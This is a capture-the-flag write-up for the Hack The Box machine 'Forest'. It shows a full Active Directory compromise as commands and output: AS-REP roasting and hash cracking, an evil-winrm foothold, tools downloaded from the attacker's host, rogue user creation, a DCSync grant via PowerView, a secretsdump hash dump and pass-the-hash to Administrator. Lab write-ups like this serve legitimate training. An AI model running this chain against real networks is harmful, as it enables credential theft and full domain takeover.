Forest #1 AD

Reconnaissance:

NMAP: 

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.161  

53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-22 02:13:22Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/21%OT=53%CT=1%CU=39143%PV=Y%DS=2%DC=I%G=Y%TM=658
OS:4EF61%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=10B%TI=I%CI=I%TS=A)SEQ(S
OS:P=FC%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=FC%GCD=1%ISR=10C%TI=I
OS:%CI=I%II=I%SS=S%TS=A)OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O
OS:4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)WIN(W1=2000%W2=2000%W3=2000%W4=
OS:2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53CNW8NNS%CC=Y%Q=)T1(R=
OS:Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%R
OS:D=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6
OS:(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=
OS:G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-12-21T18:13:58-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h46m49s, deviation: 4h37m10s, median: 6m48s
| smb2-time: 
|   date: 2023-12-22T02:13:55
|_  start_date: 2023-12-22T02:10:33
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.161 
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
┌──(kali💀kali)-[~]
└─$ nmap -p- --min-rate 10000 10.10.10.161 

53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49684/tcp open  unknown
49703/tcp open  unknown
49980/tcp open  unknown

We have 24 ports open.

  • Ports 53, 49202, 49211 & 62154: running DNS

  • Port 88: running Microsoft Windows Kerberos

  • Ports 139 & 445: running SMB

  • Ports 389 & 3268: running Microsoft Windows Active Directory LDAP

  • Port 464: running kpasswd5

  • Ports 593 & 49676: running ncacn_http

  • Ports 636 & 3269: running tcpwrapped

  • Port 5985: running wsman

  • Port 47001: running winrm

  • Port 9389: running .NET Message Framing

  • Ports 135, 49664, 49665, 49666, 49667, 49671, 49677, 49684, 49706, 49900: running Microsoft Windows RPC

  • Port 123: running NTP

Before we move on to enumeration, let’s make some mental notes about the scan results.

  • Since the Kerberos and LDAP services are running, chances are we’re dealing with a Windows Active Directory box.

  • The nmap scan leaks the domain and hostname: htb.local and FOREST.htb.local. Similarly, the SMB OS nmap scan leaks the operating system: Windows Server 2016 Standard 14393.

  • Port 389 is running LDAP. We’ll need to query it for any useful information. Same goes for SMB.

  • The WSMan and WinRM services are open. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box.

Enumeration:

Port 389 LDAP

We’ll start off with enumerating LDAP. Nmap has an NSE script that enumerates LDAP.

┌──(kali💀kali)-[~]
└─$ locate ldap-search
/usr/share/nmap/scripts/ldap-search.nse

Let’s run the script on port 389.

┌──(kali💀kali)-[/usr/share/nmap/scripts]
└─$ nmap -p 389 --script ldap-search.nse 10.10.10.161

We get a bunch of results, which I have truncated. Notice that it does leak first names, last names and addresses which are written in DTMF map format, which maps letters to their corresponding digits on the telephone keypad. This is obviously reversible. However, before I start writing a script to convert the numbers to letters, I’m going to enumerate other ports to see if I can get names from there.

We’ll run enum4linux which is a tool for enumerating information from Windows and Samba systems. It’s a wrapper around the Samba tools smbclient, rpclient, net and nmblookup. With special configuration, you can even have it query LDAP.

┌──(kali💀kali)-[~/Desktop]
└─$ enum4linux 10.10.10.161

[+]  Getting domain group memberships:                                                          
                                                                                                
Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem    
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
Group: 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
Group: 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
Group: 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
Group: 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator

Take the above usernames and save them in the file usernames.txt.

┌──(kali💀kali)-[~/Desktop]
└─$ cat usernames.txt
Administrator
DefaultAccount
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi
rc
ln

Now I have a bunch of usernames but no passwords. If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GETNPUsers impacket script to send a dummy request for authentication. The Key Distribution Center (KDC) will then return a TGT that is encrypted with the user’s password. From there, we can take the encrypted TGT, run it through a password cracker and brute force the user’s password.

When I first did this box, I assumed the Impacket script requires a username as a parameter and therefore ran the script on all the usernames that I found. However, it turns out that you can use the script to output both the vulnerable usernames and their corresponding encrypted TGTs.

┌──(kali💀kali)-[~/Desktop]
└─$ GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request

Name          MemberOf                                                PasswordLastSet      LastLogon            UAC      
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-12-21 22:50:46  2019-09-23 07:09:47  0x410200 

$krb5asrep$23$svc-alfresco@HTB.LOCAL:8b9478fb067ed6225012ab7f4a8673a4$82192559bc2eb3879918ef63cfc307731555734da50423cd4ed5793d1ac65ff0e6d30306a2e1994070c7e6c7ccbd9696034555a7f7de4bb3f59c60bee26105e85d43e7bf0ad0a0a02a83f62ea9a59063841d328a8b3a5410e64112be66735cc93c1b8b53b1f61687490d4a6aa56c4f455c42f7b165cda308461473ce001d33c512c8bad9994585fa33ff3bfd2896ff207e80ba886c91a928dd4403163958afc9ef12994a4f7128e1106aa8ef2dae3a949f66adf01fc0dfe49f83900b9638dfd5dfeff55ec2ff7d0e6d424b14ba5f54576ef75f7caeb20e24bc84dfa83830d1284f9857460003

The Kerberos pre-authentication option has been disabled for the user svc-alfresco and the KDC gave us back a TGT encrypted with the user’s password. Save the encrypted TGT in the file hash.txt.

┌──(kali💀kali)-[~/Desktop]
└─$ nano hash.txt 

┌──(kali💀kali)-[~/Desktop]
└─$ cat hash.txt     
$krb5asrep$23$svc-alfresco@HTB.LOCAL:8b9478fb067ed6225012ab7f4a8673a4$82192559bc2eb3879918ef63cfc307731555734da50423cd4ed5793d1ac65ff0e6d30306a2e1994070c7e6c7ccbd9696034555a7f7de4bb3f59c60bee26105e85d43e7bf0ad0a0a02a83f62ea9a59063841d328a8b3a5410e64112be66735cc93c1b8b53b1f61687490d4a6aa56c4f455c42f7b165cda308461473ce001d33c512c8bad9994585fa33ff3bfd2896ff207e80ba886c91a928dd4403163958afc9ef12994a4f7128e1106aa8ef2dae3a949f66adf01fc0dfe49f83900b9638dfd5dfeff55ec2ff7d0e6d424b14ba5f54576ef75f7caeb20e24bc84dfa83830d1284f9857460003

Crack the password using John the Ripper.

┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

We get back the following result showing us that it cracked the password.

s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

Foothold:

EVIL-WINRM

Now that we have the username/password svc-alfresco/s3rvice, we’ll use the Evil-WinRM script to gain an initial foothold on the box. This is only possible because the WinRM and WSMan services are open (refer to nmap scan).

┌──(kali💀kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p 's3rvice'

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> whoami
htb\svc-alfresco

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4-------------------------------

Privilege Escalation:

Enumerate the users on the domain.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user /domain

User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           Guest                    HealthMailbox0659cc1
HealthMailbox670628e     HealthMailbox6ded678     HealthMailbox7108a4e
HealthMailbox83d6781     HealthMailbox968e74d     HealthMailboxb01ac64
HealthMailboxc0a90c9     HealthMailboxc3d7722     HealthMailboxfc9daad
HealthMailboxfd87238     krbtgt                   lucinda
mark                     santi                    sebastien
SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb     SM_2c8eef0a09b545acb
SM_681f53d4942840e18     SM_75a538d3025e4db9a     SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b     SM_ca8c2ed5bdab4dc9b
svc-alfresco

Enumerate the user account we’re running as.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user svc-alfresco
User name                    svc-alfresco
Full Name                    svc-alfresco
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/21/2023 8:17:41 PM
Password expires             Never
Password changeable          12/22/2023 8:17:41 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/21/2023 7:50:49 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Service Accounts
The command completed successfully.

The user is part of the Service Accounts group. Let’s run bloodhound to see if there are any exploitable paths. First, download SharpHound.exe and setup a python server in the directory it resides in.

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555

In the target machine, download the executable.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.3:5555/SharpHound.exe', 'C:\Users\svc-alfresco\Desktop\SharpHound.exe')

Then run the program.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ./Sharphound.exe

This outputs two files.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
    Directory: C:\Users\svc-alfresco\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/21/2023   8:32 PM          34541 20231221203205_BloodHound.zip
-a----       12/21/2023   8:32 PM          77788 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----       12/21/2023   8:31 PM        1342464 SharpHound.exe
-ar---        9/23/2019   2:16 PM             32 user.txt

We need to transfer the ZIP file to our attack machine. To do that, base64 encode the file.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> certutil -encode 20231222002259_BloodHound.zip test.txt

Then output the base64 encoded file.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type test.txt

Copy it and base64 decode it on the attack machine.

┌──(kali💀kali)-[~/Desktop]
└─$ echo -n "<base64-encoded-value>" | base64 -d > bloodhound-result.zip

BLOODHOUND:

To install Bloodhound on Kali, you can apt install bloodhound. But to get an older version, I’ll build it from source.

  • From /opt/, I’ll run git clone https://github.com/BloodHoundAD/BloodHound.git to check out the code from git.

  • cd BloodHound to get into the directory

  • Looking at the release page, it looks like the last 1.x version was 1.52, around April 13. I found a commit that was from that timeframe, and checked it out with git checkout a3d5d02226.

  • Then I ran the commands from this page on (building from source](https://github.com/BloodHoundAD/BloodHound/wiki/Building-BloodHound-from-source).

The next steps are the same for apt installation or building from source:

  • Run neo4j console, which opens the neo4j web interface

  • Log in at http://127.0.0.1:7474/ with username/password “neo4j”/”neo4j”. You’ll have to change your password on login. Close the window (but don’t exit neo4j in the console).

  • Run bloodhound from a new terminal window. Log in with the creds you just set

Alright, now that we how the zipped file on our attack machine, we need to upload it to BloodHound. Next, we need to start up the neo4j database.

┌──(kali💀kali)-[~/Desktop]
└─$ sudo neo4j console

Then run bloodhound.

┌──(kali💀kali)-[~]
└─$ bloodhound

I’ll load the data by clicking the Upload data button on the right side, and selecting my zip exfil. Under “Queries”, I’ll click “Find Shorter Paths to Domain Admin”, and get the following graph:

  • Drag and drop the zipped file into BloodHound. Then set the start node to be the svc-alfresco user.

  • Right click on the user and select “Mark User as Owned”.

  • In the Queries tab, select the pre-built query “Shortest Path from Owned Principals”.

We can see that svc-alfresco is a member of the group Service Accounts which is a member of the group Privileged IT Accounts, which is a member of Account Operators. Moreover, the Account Operators group has GenericAll permissions on the Exchange Windows Permissions group, which has WriteDacl permissions on the domain.

  • svc-alfresco is not just a member of Service Accounts, but is also a member of the groups Privileged IT Accounts and Account Operators.

  • The Account Operators group grants limited account creation privileges to a User. Therefore, the user svc-alfresco can create other users on the domain. https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-accountoperators

  • The Account Operators group has GenericAll permission on the Exchange Windows Permissions group. This permission essentially gives members full control of the group and therefore allows members to directly modify group membership. Since svc-alfresco is a member of Account Operators, he is able to modify the permissions of the Exchange Windows Permissions group.

  • The Account Operators group has GenericAll permission on the Exchange Windows Permissions group. This permission essentially gives members full control of the group and therefore allows members to directly modify group membership. Since svc-alfresco is a member of Account Operators, he is able to modify the permissions of the Exchange Windows Permissions group.

Exploit

Putting all the pieces together, the following is our attack path.

  • Create a user on the domain. This is possible because svc-alfresco is a member of the group Account Operators.

  • Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.

  • Give the user DcSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.

  • Perform a DcSync attack and dump the password hashes of all the users on the domain.

  • Perform a Pass the Hash attack to get access to the administrator’s account.

Create a user on the domain.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user exodus password /add /domain

Confirm that the user was created.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user /domain

User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA     Administrator            andy
DefaultAccount           exodus                   Guest
HealthMailbox0659cc1     HealthMailbox670628e     HealthMailbox6ded678
HealthMailbox7108a4e     HealthMailbox83d6781     HealthMailbox968e74d
HealthMailboxb01ac64     HealthMailboxc0a90c9     HealthMailboxc3d7722
HealthMailboxfc9daad     HealthMailboxfd87238     krbtgt
lucinda                  mark                     santi
sebastien                SM_1b41c9286325456bb     SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb     SM_681f53d4942840e18     SM_75a538d3025e4db9a
SM_7c96b981967141ebb     SM_9b69f1b9d2cc45549     SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b     svc-alfresco
The command completed with one or more errors.

Add the user to to the Exchange Windows Permission group.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group "Exchange Windows Permissions" /add exodus

Confirm that the user was added to the group.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user exodus
User name                    exodus
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            12/22/2023 12:42:25 AM
Password expires             Never
Password changeable          12/23/2023 12:42:25 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Exchange Windows Perm *Domain Users
The command completed successfully.

PowerView

Give the user DCSync privileges. We’ll use PowerView for this. First download Powerview and setup a python server in the directory it resides in.

┌──(kali💀kali)-[~/Desktop]
└─$ python -m SimpleHTTPServer 5555

Then download the script on the target machine.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.3:5555/PowerView.ps1', 'C:\Users\svc-alfresco\Desktop\PowerView.ps1')

Use the Add-DomainObjectAcl function in PowerView to give the user DCSync privileges.

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $pass = convertto-securestring 'password' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $cred = New-Object System.Management.Automation.PSCredential('htb\exodus', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity exodus -Rights DCSync

SecretsDump

On the attack machine, use the secretsdump Impacket script to dump the password hashes of all the users on the domain.

┌──(kali💀kali)-[~/Desktop]
└─$ sudo impacket-secretsdump htb.local/exodus:password@10.10.10.161
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

PSEcex

Use psecex Impacket script to perform a pass the hash attack with the Administrator’s hash.

┌──(kali💀kali)-[~/Desktop]
└─$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
C:\Users\Administrator\Desktop>type root.txt
f04815-------------------------------
PreviousChatterboxNextActive #2 AD

Last updated